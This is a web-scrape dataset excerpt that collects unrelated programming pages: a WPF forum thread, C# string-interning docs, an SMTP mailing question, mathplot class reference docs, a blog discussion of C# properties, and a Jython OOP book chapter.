text
stringlengths 454
608k
| url
stringlengths 17
896
| dump
stringclasses 91
values | source
stringclasses 1
value | word_count
int64 101
114k
| flesch_reading_ease
float64 50
104
|
|---|---|---|---|---|---|
Answered by:
WPF Frame can not inherit value from parent
Hello
I previosly ask same question on link.
If the parent control defines a value for the property "Foreground". The WPF elements inside the Frame will not inherit that properties value.
If I add New Page to frame . then I change theme of window then it is not applying to page of the frame.
Why it is not inheriting from parent?
I need to make it null & again set theme on load of frame.
it cause performance slow of application.
Can you please help me for it?
Ref questions: am not getting any proper solution for it.
Download video n code from here
I have created video as well as small Application showing that issue.
Here When I press Add New button New frame added to DockLayoutManager.
So theme is not applied to the child that is page & controls inside the page.
Frame stop theme applying to page.
Thanking you in advance..
Regards
Vipul Langalia
Question
Answers
Hi Vipul,
From your description, I understood there is an issue regarding WPF Frame cannot inherit value
from parent.
I have an idea. I suggested you to create a class to manage the Color property. Parent
Frame and sub Frame’s Color property get from the class which managed the Color.
Firstly, we define a class to store color property, which we named this class Foreground;
Secondly, we create an instance of Foreground.
Thirdly, Binding the instance’ Foreground property to Frame.
I create a simple example to demonstrate what I said. Something looks like this,
XAML Code:
<Window x: <StackPanel> <TextBox x: <Button x: </StackPanel> </Window>
Code Behind:
public partial class MainWindow : Window { ObservableCollection<Forground> collection = new ObservableCollection<Forground>(); public MainWindow() { InitializeComponent(); collection.Add(new Forground() { Color = "Red"}); this.DataContext = collection; } private void BtnShow_Click(object sender, RoutedEventArgs e) { MessageBox.Show(collection[0].Color); } } public class Forground { private string color; public string Color { get { return color; } set { color = value; } } }
Here are some references about this issue.
#WPF Passing a value from parent to a child 'page' hosted in a frame
#ObservableCollection<T> Class
If I misunderstood, do not hesitate to contact me.
Have a nice day!
.
- Edited by Jimmy Yang'Microsoft contingent staff, Moderator Friday, August 30, 2013 7:33 AM
- Marked as answer by Jimmy Yang'Microsoft contingent staff, Moderator Thursday, September 05, 2013 2:52 AM
|
http://social.msdn.microsoft.com/Forums/en-US/c1423d20-ca00-46b2-bd14-5df194ac0bd4/wpf-frame-can-not-inherit-value-from-parent
|
CC-MAIN-2014-35
|
refinedweb
| 394
| 58.28
|
This virtual class represents objects that can be moved to an arbitrary 2D location+rotation.
The current transformation is set through SetCoordinateBase. To ease the implementation of descendent classes, mpMovableObject will be in charge of Bounding Box computation and layer rendering, assuming that the object updates its shape in m_shape_xs & m_shape_ys.
Definition at line 1433 of file mathplot.h.
#include <mrpt/otherlibs/mathplot/mathplot.h>
Default constructor (sets location and rotation to (0,0,0))
Definition at line 1438 of file mathplot.h.
References mpLAYER_PLOT.
Definition at line 1448 of file mathplot.h.
Get brush set for this layer.
Definition at line 314 of file mathplot.h.
Get a small square bitmap filled with the colour of the pen used in the layer.
Useful to create legends or similar reference to the layers.
Gets the 'continuity' property of the layer.
Definition at line 266 of file mathplot.h.
Get the current coordinate transformation.
Definition at line 1452 of file mathplot.h.
Get Draw mode: inside or outside margins.
Definition at line 293 of file mathplot.h.
Get font set for this layer.
Definition at line 251 of file mathplot.h.
Get layer type: a Layer can be of different types: plot lines, axis, info boxes, etc, this method returns the right value.
Definition at line 302 of file mathplot.h.
Get inclusive right border of bounding box.
Reimplemented from mpLayer.
Definition at line 1478 of file mathplot.h.
Get inclusive top border of bounding box.
Reimplemented from mpLayer.
Definition at line 1486 of file mathplot.h.
Get inclusive left border of bounding box.
Reimplemented from mpLayer.
Definition at line 1474 of file mathplot.h.
Get inclusive bottom border of bounding box.
Reimplemented from mpLayer.
Definition at line 1482 of file mathplot.h.
Get layer name.
Definition at line 246 of file mathplot.h.
Get pen set for this layer.
Definition at line 256 of file mathplot.h.
Check whether this layer has a bounding box.
The default implementation returns TRUE. Override and return FALSE if your mpLayer implementation should be ignored by the calculation of the global bounding box for all layers in a mpWindow.
Reimplemented from mpLayer.
Definition at line 1470 of file mathplot.h.
Check whether the layer is an info box.
The default implementation returns FALSE. It is overrided to TRUE for mpInfoLayer class and its derivative. It is necessary to define mouse actions behaviour over info boxes.
Reimplemented in mpInfoLayer.
Definition at line 178 of file mathplot.h.
Checks whether the layer is visible or not.
Definition at line 306 of file mathplot.h.
Plot given view of layer to the given device context.
An implementation of this function has to transform layer coordinates to wxDC coordinates based on the view parameters retrievable from the mpWindow passed in w. Note that the public methods of mpWindow: x2p,y2p and p2x,p2y are already provided which transform layer coordinates to DC pixel coordinates, and user code should rely on them for portability and future changes to be applied transparently, instead of implementing the following formulas manually.
The passed device context dc has its coordinate origin set to the top-left corner of the visible area (the default). The coordinate orientation is as shown in the following picture:
(wxDC origin 0,0) x-------------> ascending X ----------------+ | | | | V ascending Y | | | | | | | +-------------------------------------------+ <-- right-bottom corner of the mpWindow visible area.
Note that Y ascends in downward direction, whereas the usual vertical orientation for mathematical plots is vice versa. Thus Y-orientation will be swapped usually, when transforming between wxDC and mpLayer coordinates. This change of coordinates is taken into account in the methods p2x,p2y,x2p,y2p.
Rules for transformation between mpLayer and wxDC coordinates
dc_X = (layer_X - mpWindow::GetPosX()) * mpWindow::GetScaleX() dc_Y = (mpWindow::GetPosY() - layer_Y) * mpWindow::GetScaleY() // swapping Y-orientation layer_X = (dc_X / mpWindow::GetScaleX()) + mpWindow::GetPosX() // scale guaranteed to be not 0 layer_Y = mpWindow::GetPosY() - (dc_Y / mpWindow::GetScaleY()) // swapping Y-orientation
Set label axis alignment.
Definition at line 1493 of file mathplot.h.
Set layer brush.
Definition at line 318 of file mathplot.h.
Set the 'continuity' property of the layer (true:draws a continuous line, false:draws separate points).
Definition at line 261 of file mathplot.h.
Set the coordinate transformation (phi in radians, 0 means no rotation).
Definition at line 1461 of file mathplot.h.
References mpALIGN_NE, and Eigen::internal::y.
Set Draw mode: inside or outside margins.
Default is outside, which allows the layer to draw up to the mpWindow border.
Definition at line 289 of file mathplot.h.
Set layer font.
Definition at line 280 of file mathplot.h.
Set layer name.
Definition at line 275 of file mathplot.h.
Set layer pen.
Definition at line 285 of file mathplot.h.
Sets layer visibility.
Definition at line 310 of file mathplot.h.
Must be called by the descendent class after updating the shape (m_shape_xs/ys), or when the transformation changes.
This method updates the buffers m_trans_shape_xs/ys, and the precomputed bounding box.
Shows or hides the text label with the name of the layer (default is visible).
Definition at line 270 of file mathplot.h.
A method for 2D translation and rotation, using the current transformation stored in m_reference_x,m_reference_y,m_reference_phi.
The precomputed bounding box:
Definition at line 1518 of file mathplot.h.
Layer's brush.
Reimplemented in mpInfoLayer.
Definition at line 323 of file mathplot.h.
Specify if the layer will be plotted as a continuous line or a set of points.
Definition at line 325 of file mathplot.h.
select if the layer should draw only inside margins or over all DC
Definition at line 327 of file mathplot.h.
Holds label alignment.
Definition at line 1493 of file mathplot.h.
Layer's font.
Definition at line 318 of file mathplot.h.
Layer's name.
Definition at line 324 of file mathplot.h.
Layer's pen.
Definition at line 322 of file mathplot.h.
The coordinates of the object (orientation "phi" is in radians).
Definition at line 1500 of file mathplot.h.
This contains the object points, in local coordinates (to be transformed by the current transformation).
Definition at line 1508 of file mathplot.h.
Definition at line 1508 of file mathplot.h.
States whether the name of the layer must be shown (default is true).
Definition at line 326 of file mathplot.h.
The buffer for the translated & rotated points (to avoid recomputing them with each mpWindow refresh).
Definition at line 1513 of file mathplot.h.
Definition at line 1513 of file mathplot.h.
Define layer type, which is assigned by constructor.
Definition at line 328 of file mathplot.h.
Toggles layer visibility.
Definition at line 329 of file mathplot.h.
|
http://reference.mrpt.org/stable/classmp_movable_object.html
|
crawl-003
|
refinedweb
| 1,106
| 53.27
|
Learn how easy it is to sync an existing GitHub or Google Code repo to a SourceForge project! See Demo
You can subscribe to this list here.
Showing
6
results of 6
Here.
>>>>> "fred" == fred <fredmfp@...> writes:
fred> Hi the list, Is it possible to have some curves not legended
fred> ?
ax.plot(x,y,label='_nolegend_')
Help on function legend in module matplotlib.pylab:
legend(*args, **kwargs)
LEGEND(*args, **kwargs)
Place a legend on the current axes at location loc. Labels are a
sequence of strings and loc can be a string or an integer
specifying the legend location
USAGE:
Make a legend with existing lines
>>> legend()
legend by itself will try and build a legend using the label
property of the lines/patches/collections. You can set the
label of a line by doing plot(x, y, label='my data') or
line.set_label('mydata'). If label is set to '_nolegend_', the
item will not be shown in legend.
JDH
Hi to all,
I'm writing a web application with zope+python. I've made a first try to
insert a graph using zope external method an following the instruction
reported in this sample:
I have some problem with the imports; zope tell me:
Error Type: ImportError
Error Value: cannot import name FigureCanvasAgg
This is due to the instruction 7:
1 import matplotlib
2 matplotlib.use('Agg')
3 from pylab import *
4 from os import *
5 from StringIO import StringIO
6 from PIL import Image as PILImage
7 from matplotlib.backends.backend_agg import FigureCanvasAgg
[...]
The path of the file backends_agg.py is correct. Have you got any
suggestion.
Thanks.
Hi the list,
Is it possible to have some curves not legended ?
A sample example is better :
I whish the pointed curves to be not displayed in the legend box.
How can I do this ?
Cheers,
--.
Hi the list,
I have looked for in mailing-list archive, but did not find anything
relevant.
I use matplotlib 0.87-5 and I want to try some examples concerning fonts
in .examples/.
When I run fonts_demo.py, I get the following messages :
:~...matplotlib-0.87.5/examples/{58}/> python fonts_demo.py
/usr/local/lib/python2.4/site-packages/matplotlib/font_manager.py:989:
UserWarning: Could not match cursive, fantasy, sans-serif, italic, normal. Returning
/usr/local/lib/python2.4/site-packages/matplotlib/mpl-data/Vera.ttf
warnings.warn('Could not match %s, %s, %s. Returning %s' % (name,
style, variant, self.defaultFont))
What am I doing wrong ?
In fact, all fonts displayed in the window are the same.
Any suggestion ?
Cheers,
PS : python 2.4, freetype-2.1.7-6, libpng-1.2.8 on a debian sarge linux b=
ox.
--.
Hello,
I can't seem to get matplotlib-0.87.5 to work with numpy1.0rc:
Python 2.4.3 (#1, Sep 21 2006, 13:06:42)
[GCC 4.1.1 (Gentoo 4.1.1)] *
File "/usr/lib/python2.4/site-packages/matplotlib/pylab.py", line 196, in ?
import cm
File "/usr/lib/python2.4/site-packages/matplotlib/cm.py", line 5, in ?
import colors
File "/usr/lib/python2.4/site-packages/matplotlib/colors.py", line 33, in ?
from numerix import array, arange, take, put, Float, Int, where, \
File "/usr/lib/python2.4/site-packages/matplotlib/numerix/__init__.py", line
74, in ?
Matrix = matrix
NameError: name 'matrix' is not defined
This is on an AMD64 platform. I tried removing the build directories of both
packages, and reinstalling, but that didn't work.
Am I missing something?
Thanks!
Peter
|
http://sourceforge.net/p/matplotlib/mailman/matplotlib-users/?viewmonth=200609&viewday=22
|
CC-MAIN-2015-18
|
refinedweb
| 585
| 70.09
|
How about:
import matplotlib.pyplot as plt
x_sqr = 42.42
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(range(5))
ax.text(3, 2, r'x$^2$ = %.2f' % x_sqr)
plt.show()
Cheers,
Scott
···
---------- Forwarded message ----------
From: Scott Sinclair <scott.sinclair.za@...287...>
Date: 17 May 2011 14:52
Subject: Re: [Matplotlib-users] result in the graph
To: Waleria <waleriantunes@...287...>
On 17 May 2011 14:35, Waleria <waleriantunes@...287...> wrote:
Hello all,
I have this code: (part that generates the chart)
. So i need to show a result in the graph, i have the line 69 (variable
x_sqr) in code, i need to show tthe result of variable in the graph. How can
i do this?
|
https://discourse.matplotlib.org/t/result-in-the-graph/15464
|
CC-MAIN-2019-51
|
refinedweb
| 117
| 80.28
|
Jay?
Personally, I wish that the design of C# had taken properties a bit more into account and given us a simpler system to express them in the simple(and considerably more common) scenarios where they are nothing but simple wrappers. I know it is a tricky syntax to come up with, but it would be *alot* cleaner, for component developers and internal situations if you could easily write
public property string X{get;set;}
or just
public string X{get;set;}
I assume that such a construct was considered and thrown out for good reason, but it is something I’d like to see some day.
That’s fine, but it means that data binding and serialization (both XML and binary) break right?
Reflection breaks too right? So all the code generators go out the window.
Don’t get me wrong, I agree with the use of public fields instead of properties. But it seems to me that the time to decide this issue was long before now. We’re stuck with it and to change now would be pretty disasterous.
Unless you mean, "Use public fields unless you have to use properties". That makes sense.
Daniel: It seems to me at that point you’re just writing a public field but with some extra sugar. Maybe an attribute modifier would be a better choice?
[property]
public string hootie = "";
The definition of the syntax is tough. In the ideal case you would want to allow
1) simple getset properties
2) simple get properties with either a private set or a compiler generated direct field set(similar to how simple event invocations work)
3) similar simple set properties with private or generated get code.
4) the ability to apply attributes to that property. The above syntax implies that you define a field which the compiler generates a property for. This would make it hard to apply an attribute to that property, and certainly would make it impossible in an clean manner.
While the attribute would work, it lacks a clean way to express granularity and it requires considerable modification to the expression if you decide to change the property. To express granularity, you’d end up defining enums and other bits of data which the langauge already defines as pseudo-keywords, and there is no way to fix the difference in expression. Also, I think Attributes are really overused and shouldn’t be used to implement language features.
ALso, looking at it again, even with the attribute it looks like a field, not a property, and will be read as such.
Each syntax I’ve looked at has one downside or another, I finally decided that the public string X{get;set;} approach made the most sense because of how similar it was to the exising syntax. It doesn’t allow for custom fields, but it does solve alot of the issues with properties, as I see them. The compiler generating the underlying field access is a possibile way to avoid the need for custom fields, although it has some issues(the accessor could be used as a ref parameter, for example, resulting in an assignment even though its supposedly a "get", etc).
I know you said ‘single project that gets built all at once’ – but just to be clear and picky, you also have to make sure you never call that project from anywhere else or it becomes a real pain to change. Changing a public field to a property will your code’s interface, breaking any calling code, until that code is recompiled too.
Personally it is rare that I’m sure code will never be used elsewhere one day… Maybe these preferences just come down to the types of projects one does. If you use code folding they are pretty much identical for scanning code (though I hate they way accessors need those extra clicks to unfold, ugh). Tthe main argument against using them seems to be ‘too much typing’, which sounds more like a syntax/ide problem than an inherent problem with properties, no? It is pretty easy to make a macro or codegen, not sure I’d sacrifice even a tiny benefit if that is the basic reason…
Just support something like this:
public Button CancelButton { set; get; }
(maybe some extra keyword)
now have the compiler to translate this to the following code automatically:
private Button cancelButton;
public Button CancelButton
{
set { this.cancelButton = value; }
get { return this.cancelButton; }
}
I’m really wondering why this shortcut wasn’t supported in .NET 1.0 already.
Whidbey C# now supports crazy geek toys like Generics but still no support for simple stuff like this 🙁
FixIt:
In VS 2005 C# you can type prop and press the tab key twice, and a property will be added with a private field, this will make it much easier and faster to add a property to the code.
Sorry FixIt, I misunderstand you post, I read it like the IDE should automatically add the while property body with a private field. So please ignore my post.
I like FixIt ideas about just add
public Button CancelButton { set; get; }
But this is a similar way of adding a property to an interface. So I think this could confuse developers.
You could add a keyword:
public Button CancelButton { set; get; auto; }
or something like that.
There is definitely a solution way of doing this easily.
My wish for properties (and I’m not alone here) includes the ability to make get and set be differently accessable. More often than not, "get" would be public and "set" might be internal or private.
Clinton Pierce:
You can set different protection levels on set and get in C# 2.0
I agree with Scott. I use properties all the time – but that is mainly because of the chance that I might need to bind or use reflection with an object (etc).
However, I *don’t* like the idea mentioned by some here about using something like:
public Button CancelButton { set; get; }
and have the compiler interpret that to mean:
private Button cancelButton;
public Button CancelButton
{
set { this.cancelButton = value; }
get { return this.cancelButton; }
}
I don’t like the idea of "assumed" private members. That to me seems to fix a manifestation of the problem rather that just fix the problem itself. I’d rather see things like object binding just work with public fields as well as properties.
I look forward to VS 2005 and being able to use expansion to create my properties.
I think that despite of this rutine work – using properties is still the right way. Modern app look like this:
database tables/fields mapped to classes/properties mapped to UI fields. And of course we use stored procedures when speaking to database tables. It is so easy to map SP parameters to class properties (datatypes, etc) that it makes it be the right way.
Download the free add-in called QickCode from. It lets you customize simple keyword expansion from within VS.net 2002/2003. It’s really cool, and if you consider that you can reduce the amount of typing you do, yet end up with the encapsulation of properties, it’s well worth the $29…
More info properties. This sort of extends on the topic Kyle covered in his article. In Jay’s post the read only situation was something I hadn’t thought of with sticking with the simpler public properties. But really, regardless of which method you use if you decide to go from a read/write to a read only you’re going to break something.? [C# Stuff]…
Ryan:
Do you write addremove handlers for all of your events or are you ok with those assumed private members?
The problem isn’t nessecerily that binding doesn’t work with fields as that fields aren’t properties and don’t provide *any* of the extras that properties do. I think that if the language had been designed assuming public fields would never be used, property design would have been considerably simpler. This kind of work already went into events because writing simple event handlers manually is a pain and usually a waste of effort. Writing simple property accessors manually is a pain as well, but it wasn’t handled anywhere near as gracefully.
It’s too late now, but what about
public field string _name;
public property string Name;
I generally would agree with Ryan about assumed private members being a bad thing. But I also like what I think Thomas is hinting at – what if a simple
public property string Name;
was equivalent to something like
private string ___name;
public string Name
{
get { return ___name; }
set { ___name = value; }
}
BUT if you declared Name using get & set, nothing would be automagically linked up?
Of course is there really any difference between that and a public field?
> Of course is there really any difference between that and a public field?
As a matter of implementation, there is quite a bit of difference. A property != a field and should never be considered to, even if they look alike in source. They may provide the same service but they do it quite differntly. Its been suggested that a property is far closer to a method than a field. I don’t quite understand why people are so unaware of the differing semantics. These "good as" arguments are a touch scary.
2 points for me on using properties over public fields (for simple get/set, no other logic implementations) are consistency and debug-ability.
From the debugging side it means that a break point can be placed on a single point and all writes to a variable can be trapped.
> Of course is there really any difference between that [get/set property] and a public field?
Properties can’t be passed as ref/out method parameters.
Why not just make all read-only accessors/properties not read-only to the local object, or use a built-in property-property ".Value"? to represent the underlying private member. Maybe a friend modifier to allow objects from the same namespace to access the private member?
// read-only
property string Name {get;}
// write-only: initializer built in…
property friend Location Location {set;} = new Location("Unknown");
// read-write
property int Age = 0;
// somewhere else in the same object scope
// use .Value to short-circuit accessibility
this.Name.Value = "Your Name";
this.Age = 33;
this.WhereAbouts = new Location("Home");
// in another object in the same namespace:
Location personLocation = Person.WhereAbouts.Value;
[][][][][][][][][][][][][][][][][][][]
PingBack from
PingBack from
|
https://blogs.msdn.microsoft.com/ericgu/2004/04/29/jay-and-properties/?replytocom=18123
|
CC-MAIN-2018-13
|
refinedweb
| 1,756
| 60.55
|
.
using System; public class Example { public static void Main() { string str1 = "a"; string str2 = str1 + "b"; string str3 = str2 + "c"; string[] strings = { "value", "part1" + "_" + "part2", str3, String.Empty, null }; foreach (var value in strings) { if (value == null) continue; bool interned = String.IsInterned(value) != null; if (interned) Console.WriteLine("'{0}' is in the string intern pool.", value); else Console.WriteLine("'{0}' is not in the string intern pool.", value); } } } //) using System; using System.Text; using static void Main() { // String str1 is known at compile time, and is automatically interned. String str1 = "abcd"; // Constructed string, str2, is not explicitly or automatically interned. String str2 = new StringBuilder().Append("wx").Append("yz").ToString(); Console.WriteLine(); Test(1, str1); Test(2, str2); } public static void Test(int sequence, String str) { Console.Write("{0}) The string, '", sequence); String strInterned = String.IsInterned(str); if (strInterned == null) Console.WriteLine("{0}', is not interned.", str); else Console.WriteLine("{0}', is interned.", strInterned); } } /
|
https://msdn.microsoft.com/en-us/library/system.string.isinterned(v=vs.110).aspx
|
CC-MAIN-2018-34
|
refinedweb
| 154
| 63.25
|
The .NET framework has a class (or rather a set of related classes) that makes sending mails via SMTP relatively simple. I think a good point to start reading about that is.
However, as you have a rich text box as the source of your mail text, you may want to send it formatted which isn't that easy anymore. In particular sending RTF-formatted text incurs some specific problems that have recently been discussed in, with not very optimistic conclusions. OTOH sending the formatted text as HTML, which is the common way of doing that, of course requires format conversion/HTML generation which is additional effort.
BTW, when you talk about "without any login requirement", I think the best you can reasonably get of course is that yor mailing application holds the credentials to log into the SMTP server (or obtains them from Windows) and just the user doesn't need to enter any login. The only alternative to that, out on the net, that comes to my mind now are SMTP servers that allow anonymous login, but I think they'll always have a bad reputation (or will quickly get one) due to being (ab)used to distribute spam. A corporate SMTP server that only allows anonymous loging from inside the corporate network might be an alternative, but if you have that, then why not simply obtain login credentials for your program from the admin in the first place? reply i have this code :
using namespace System::Net::Mail;
private: System::Void button1_Click(System::Object^ sender, System::EventArgs^ e) {
SmtpClient^ sc = gcnew SmtpClient();
sc->Host = "localhost";
sc->Port = 25;
MailMessage^ mm = gcnew MailMessage();
mm->From = gcnew MailAddress("bad@nysc");
mm->To->Add(gcnew MailAddress("emre@nyeotech.com"));
mm->Body = richTextBox1->Text;
sc->Send(mm);
}
};
}
It compiles fine, but when i click the button I get this error: An unhandled exception of type 'System.Net.Mail.SmtpException' occurred in System.dll
Originally Posted by emreozpalamutcu
It compiles fine, but when i click the button I get this error: An unhandled exception of type 'System.Net.Mail.SmtpException' occurred in System.dll
And what is the descriptive message carried by the exception? It usually is right next to the exception type mentioned in the exception message box. These messages usually are quite informative in the .NET framework.
And you definitely do have an SMPT server running on your localhost?
here is the expection
Additional information: Failure sending mail.
thats all other info and what you mena smpt server running on my local host how to do that and if other people use this program do they have to do it to?
Originally Posted by emreozpalamutcu
here is the expection
Additional information: Failure sending mail.
thats all other info [...]
Ok, I dug out the log files from the early tests of my own little command line mailer and it turned out that, in case the SMTP server is not found, the actual interesting info is hidden inside the inner exception which is available as the exception's InnerException property. Are you catching and displaying the exception yourself? (At least it looks like that because the .NET runtime's built-in exception message box displays much more information.) In that case I suggest you output e->ToString() rather than e->Message. The ToString() member of the .NET exceptions retrieves a bunch of useful information in a single call. I use it all the time.
and what you mena smpt server running on my local host how to do that and if other people use this program do they have to do it to?
If you don't know whether you have one, then you probably don't have one.
Everybody (you, your users, me etc.) needs an SMTP server to send mail (as I already implied in post #2). An SMTP client like your program or my little command line mailer (or Outlook or Thunderbird for that matter) merely commits the mail(s) to the server which in turn initiates the actual process of transporting the mail over the net. So the SMTP server can be seen as kind of a post box.
You, as well as your users, need the proper credentials (user name and password) to log into the server. To free the user from entering the credentials everytime he/she wants to send mails, the client usually is configured to remember the credentials. But of course that does not mean you don't need them. My own mailer, for instance, currently can acquire the credentials from the command line, its app config file or Windows (in case the user has the same credentials on Windows and the SMTP server).
View Tag Cloud
Forum Rules
|
http://forums.codeguru.com/showthread.php?513815-How-to-email-a-simple-plain-text-on-windows-form-applications&p=2021316
|
CC-MAIN-2014-10
|
refinedweb
| 785
| 61.16
|
Hi Neil,
You'll want to get the collection in your controller, loop through in the view and put a tick or cross based on one of the properties on the model.
Nothing wrong with simple logic like this in your views
if @set_ids.include?(album.set_id)
Hey Mark. Thanks for the reply. The problem is that for every set returned from Flickr I need to do a find on my local Albums table to see if a corresponding record exists. So I basically need to do that check and I want to build up a sort of hash with the album name, flickr id and a tick or cross whether I have a local copy or not. I'm thinking the logic would be something along the lines of:
@sets = Flickr.get_set_list
@sets.each_with_index do |index, set|Album.find_by_flickr_id(set[id])end
But I need to put that info into a hash and then pass that to the view but is this too much logic to put in my controller? and if so, to me it doesn;t seem right putting it in the model, so I'm not really sure where to put it.
Also, how would I get that data into the hash I could do with ending up with?
Thanks,Neil
I'm not sure what's inside the get_set_list method but it sounds like you should just be able to do one query with a join between them.
If that's not the case you might just be able to search for the albums with the id's from the first query.
@set_ids = Flickr.get_set_list.map{ |set| set.id }
@albums = Album.where("flickr_id in (?)", set_ids)
Yes, you want to keep your controllers are light as possible. The model is the correct place to put this sort of thing, or if you're doing a lot with Flickr then you might put it all inside the Flickr module.
class Album
def self.within_flickr_sets
set_ids = Flickr.get_set_list().map{ |set| set.id }
Album.where("flickr_id in (?)", set_ids)
end
end
Then in your controller you can just have this:
@albums = Album.within_flickr_sets()
|
https://www.sitepoint.com/community/t/where-do-i-do-this/19320
|
CC-MAIN-2017-09
|
refinedweb
| 353
| 81.33
|
Nokia N82 2.4 inch QVGA TFT on the Arduino
It’s been a few months now since I released the original two articles that detailed the design, build and optimised software library for the 2.0″ Nokia 6300 QVGA TFT connected to the Arduino Mega XMEM interface. Judging by the responses I’ve had, there’s a lot of you out there that are interested in connecting these mobile phone TFTs to your Arduinos.
Today we move on to reverse-engineer another Nokia QVGA TFT. This time we’re going to tackle the Nokia N82. Read on to find out how I got on.
The N82 TFT
The N82 TFT is a 2.4″ panel that’s also found in the N77, N78, N79, E66, E52, E75 and 6210S. It’s certainly clear that back in the not-so-distant past when Nokia was the clear market leader in mobile phones they certainly knew how, as a company, to take a successful design and keep re-releasing it over and over again with small tweaks to keep the income rolling in. Replacement N82 panels are available at the time of writing for as low as £3 on ebay.
Two TFTs. The N82 next to the 6300.
You can get an idea of the physical size difference between the 2.4″ and 2.0″ panels from the above photograph. The resolution is identical, the pixels are simply larger on the N82 panel. Pixel densities are around 200ppi for the 6300 and 167ppi for the N82. Having a higher pixel density means that your graphics appear smoother. Having a lower pixel density makes your text larger, and perhaps more readable.
The schematic and the connector
It must be our lucky day because the pinout to the N82 is identical to the 6300 and it uses the same 24-pin board-to-board connector too! The 0.4mm pitch connector:
gsmserver.com
cellnetos.com
stellatech.com
The pinout for the connector is shown here:
Here’s a photograph of the connector plug. If you look closely you can see where the ground pins connect directly into the ‘ground pour’ inside the ribbon cable. This helps to identify where pin 1 is located when doing the reverse engineering.
The connector on the LCD FPC cable
The backlight
The backlight shares the same design as the 6300 in that it consists of four white LEDs in series. Therefore we will use the same NCP5007 constant current LED driver from OnSemi that we’ve been using in all our Nokia TFT designs so far.
The NCP5007 in SOT23-5 package
The NCP5007 will be configured to supply a constant 20mA through the backlight circuit and we will use a PWM signal on the ENABLE pin to vary the brightness. The NCP5007 really is a wonderful little device – truly one of those things that ‘just works’ and I’ll use it wherever I need to drive up to 5 LEDs.
The development board schematic
We’ll gloss over the explanation of how we drive the TFT controller using the Arduino Mega XMEM interface because that’s all been explained in this article and there are no changes to the interface in this design.
The Eagle schematic, click to download a PDF.
Just as before, we choose to use the 74ALVC164245 16-channel level converter from NXP to handle the conversion of the 5V signals from the Arduino down to a safe level of 3.3V where they won’t damage the panel.
The Eagle PCB design, click for larger.
In this design I’m using the TSOP-48 (0.5mm) pitch version of the level converter rather than the SSOP-48 (0.635mm) pitch that I used in the 6300 design. The reason for the change is that the TSOP-48 package is more readily available from the suppliers that I use.
Another slight change, again due to parts availability, is the inductor. I’ve switched to a slightly different model that has a larger footprint but is otherwise functionally identical to the one I was using before.
Bill of Materials
Here’s a full list of parts used in this development board.
The development board
I generated the Gerber’s from Eagle and sent them off to ITead Studio to be printed using their very good value prototype PCB service. A few weeks later they arrived and all were perfect, just as I’ve come to expect.
The front of the PCB. The pads are not gold, the tungsten lighting used in the photograph just makes them look like they are.
The back of the PCB
Building the board is a familiar process for me by now. In case you’re interested, this is the procedure that I follow.
- Flux the pads then tin them with an iron so they all have little solder bumps on them. For the level converter and the connector this means loading up the tip of the iron with solder and lightly dragging it over the pads.
- Use a very small amount of paste flux as a glue to hold down the level converter, connector and inductor in place on the board. Overdoing the flux can cause bubbling during the reflow which will cause the component to move out of position (very bad).
- Heat the board with the three parts on a hot-plate until the solder reflows and the parts sit down into position.
- Inspect the joints under a microscope and use a fine-tip iron to touch each one that shows any movement when prodded with a pin. There will be at least one…
- Use tweezers and a hot-air gun to reflow the other components into place.
- Clean the board with soapy water and a toothbrush then leave for at least 24 hours in the airing cupboard to dry out.
- Solder the 2.54mm headers and test.
So it’s not a short process but the rewards are worth the effort. Here’s the fully built development board.
The board, fully built and awaiting the LCD
And here’s a shot with the LCD fitted. The 2.4″ display is a little oversized for the PCB but fits firmly and saves the additional cost of the larger PCB just to mount the screen.
The board with the LCD attached.
Driver source code
My XMEM driver code has been updated to include support for the N82. You will need to download at least version 2.1.0 of the driver to get that support.
Because the panel is driven identically to the Nokia 6300, all the examples will work as-is with no changes. However, for completeness I have included “N82″ driver names just in case I need to create specific customisations for this panel in the future.
#include "NokiaN82.h" using namespace lcd; typedef NokiaN82_Portrait_262K TftPanel;
The example snippet shows the driver name (NokiaN82_Portrait_262K ) and the header file (NokiaN82.h). Similar driver names for the Landscape orientation and 16M and 64K display modes (if supported by the panel) are included.
Another example
I created a full example that exercises the compressed graphics capability of the driver in a simulation of the output from a weather station on the Arduino. The source code is included in version 2.1.0 and above of the software driver.
This demo packs in 100Kb of compressed graphics in to the Atmega1280 and the controller code takes up a further 10Kb or so. The graphics are decompressed on-the-fly from flash by my LZG decoder routine included with the driver.
Here’s a video of the demo in action. Watch it here or click to watch in HD at YouTube.
The graphical weather images were downloaded from the Wikimedia Commons library. Please respect the rights of the original authors:
Snow image
Partly cloudy image
Rain image
Sun image
The numeric ‘temperature readout’ was created by typing the numbers 0..9 and the point and degree symbols into Wordpad in a nice font at 48 point size. Then I took a screenshot and used a paint program to crop out each character into its own bitmap and saved each one as a separate PNG.
I then ran the bm2rgbi utility included with the graphics library to convert the PNGs to LZG format and imported those binaries directly into the compiled flash image. You can see how that’s done by reading the example source code.
JPEG support now available
I’m pleased to announce driver support for displaying JPEG images. JPEG images may be compiled into flash and displayed from there or they may be streamed over an Arduino serial connection.
The driver documentation has been updated to include sample code and a demo video that shows you how to do it.
Here’s a link to the video that shows the JPEG decoder operating on images stored in flash. If you’d like to see it operating on JPEG images received over the serial link then please refer to the main driver documentation. The JPEG decoder is completely compatible with the Nokia 6300 as well as the N82.
Can I use it with the standard Arduino?
Yes you can, see this article for a write-up, including performance analysis and optimisations. The article is focused on the 6300 but the N82 works in exactly the same way..
Print your own PCBs
Want to try assembling a board yourself but don’t have a home-etching kit? No problem, just download the Gerber files from my downloads page and use an online prototyping service such as that offered by Seeed Studio, ITead Studio or Elecrow.
30 Comments
|
http://andybrown.me.uk/wk/2012/08/19/nokia-n82-arduino/
|
CC-MAIN-2013-48
|
refinedweb
| 1,605
| 71.44
|
Source
JythonBook / chapter5.rst
Chapter 5: Object Oriented Jython
This chapter is going to cover the basics of object oriented programming. If you're familiar with the concepts. I'll start with covering the basic reasons for why you would want to write object oriented code in the first place, then cover all the basic syntax, and finally I'll show you a non-trivial example.
Object oriented programming is a method of programming where you package your code up into bundles of data and behaviour. In Jython, you can define a template for this bundle with a class definition With this first class written, you can then instantiate copies of your object and have them act upon each other. This helps you organize your code into smaller more manageable bundles
Throughout this chapter, I interchangably use Python and Jython - for regular object oriented programming - the two dialects of Python are so similar that there are no meaningful differences between the two languages. Enough introduction text though - let's take a look at some basic syntax to see what this is all about.
Basic Syntax
Writing a class is really simple. It is fundamentally about managing some kind of 'state' and exposing some functions to manipulate that state. In object jargon - we just call those functions 'methods'.
